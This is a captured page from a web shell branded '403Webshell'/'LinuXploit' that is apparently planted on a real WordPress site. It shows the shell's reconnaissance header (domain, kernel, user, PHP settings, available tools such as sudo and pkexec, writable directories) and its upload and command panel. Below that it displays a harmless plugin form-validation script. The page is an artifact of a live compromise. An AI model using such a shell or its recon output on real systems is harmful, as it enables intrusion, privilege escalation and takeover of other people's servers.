403Webshell
Server IP : www.new.bangkokfinder.com  /  Your IP : 172.71.82.25
Web Server : nginx/1.20.1
System : Linux new 4.15.0-159-generic #167-Ubuntu SMP Tue Sep 21 08:55:05 UTC 2021 x86_64
User : bangkokfinder ( 1000)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bangkokfinder/www/wp-content/plugins/plugin-organizer/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/bangkokfinder/www/wp-content/plugins/plugin-organizer/js/validation.js
<!--
function PO_form_validation(frmId) {
	var frm = jQuery('#'.frmId);
	var pass=true;
	var frmElements = jQuery('#'+frmId+' input, #'+frmId+' textarea');
	for (var i=0; i < frmElements.length; i++){
		//alert(frmElements[i].name + " = " + regex[frmElements[i].name]);
		if (typeof(regex[frmElements[i].name]) == 'undefined') {
			regex[frmElements[i].name] = regex['default'];
		}
		
		var labelName = frmElements[i].name.replace('[','');
		labelID = labelName.replace(']','');
		if (frmElements[i].type != 'button' && frmElements[i].type != 'file' && frmElements[i].type != 'submit' && frmElements[i].type != 'image' && frmElements[i].type != 'hidden' && !regex[frmElements[i].name].test(frmElements[i].value)) {
			pass = false;
			var label=jQuery('#'+labelID + "Label");
			if (label) {
				alert(label.html() + ' is invalid.');
				jQuery('#'+labelID + "Label").addClass('badInputLabel');
			} else if (frmElements[i].title) {
				alert(frmElements[i].title + ' is invalid.');
				frmElements[i].addClass('badInput');
			} else {
				frmElements[i].addClass('badInput');
			}
			
		} else if (frmElements[i].type != 'file' && frmElements[i].type != 'button' && frmElements[i].type != 'submit' && frmElements[i].type != 'image' && frmElements[i].type != 'hidden') {
			var label=jQuery('#'+labelID + "Label");
			if (label) {
				jQuery('#'+labelID + "Label").removeClass('badInputLabel');
			} else {
				frmElements[i].removeClass('badInput');
			}
		}
	}
	return pass;
}
-->

Youez - 2016 - github.com/yon3zu
LinuXploit